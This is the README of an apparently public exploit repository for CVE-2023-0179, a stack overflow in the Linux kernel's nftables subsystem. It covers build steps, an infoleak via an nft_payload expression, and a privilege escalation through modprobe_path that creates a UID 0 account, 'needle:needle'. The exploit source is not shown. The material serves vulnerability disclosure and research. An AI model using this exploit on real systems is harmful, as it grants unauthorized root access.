# Needle (CVE-2023-0179) exploit
This repository contains the exploit for my recently discovered vulnerability in the nftables subsystem that was assigned CVE-2023-0179, affecting all Linux versions from 5.5 to 6.2-rc3, although the exploit was tested on 6.1.6.
The vulnerability details and writeup can be found on [oss-security](https://www.openwall.com/lists/oss-security/2023/01/13/2)
## Building instructions
Just invoke the `make needle` command to generate the corresponding executable.
`libmnl` and `libnftnl` are required for the build to succeed:
```bash
sudo apt-get install libmnl-dev libnftnl-dev
```
## Infoleak
The exploit will enter an unprivileged user and network namespace and add an `nft_payload` expression via the `rule_add_payload` function which, when evaluated, will trigger the stack buffer overflow and overwrite the registers.
The content is then retrieved with the following nft command:
`nft list map netdev mytable myset12`
The output will leak several shuffled addresses relative to kernel data structures, among which we find a kernel instruction address and the regs pointer.
## LPE
The exploit creates a new user account `needle:needle` with UID 0 by abusing the `modprobe_path` variable.
Enjoy root privileges.
## Demo
[](https://asciinema.org/a/mVTu420tWy8ocdFY70sWD9VLO)
## Credits
- David Bouman's `libnftnl` [implementation](https://github.com/pqlx/CVE-2022-1015) and detailed [blog post](https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/)
[4.0K] /data/pocs/611a8649cd96dfedaa74aacc452dec5887abf461
├── [134K] config
├── [ 13K] exploit.c
├── [1.4K] exploit.h
├── [ 12K] helpers.c
├── [3.0K] helpers.h
├── [1.0K] LICENSE
├── [ 247] Makefile
├── [4.6K] needle.c
├── [1.6K] README.md
├── [1.1K] run.sh
└── [ 430] setup.sh
0 directories, 11 files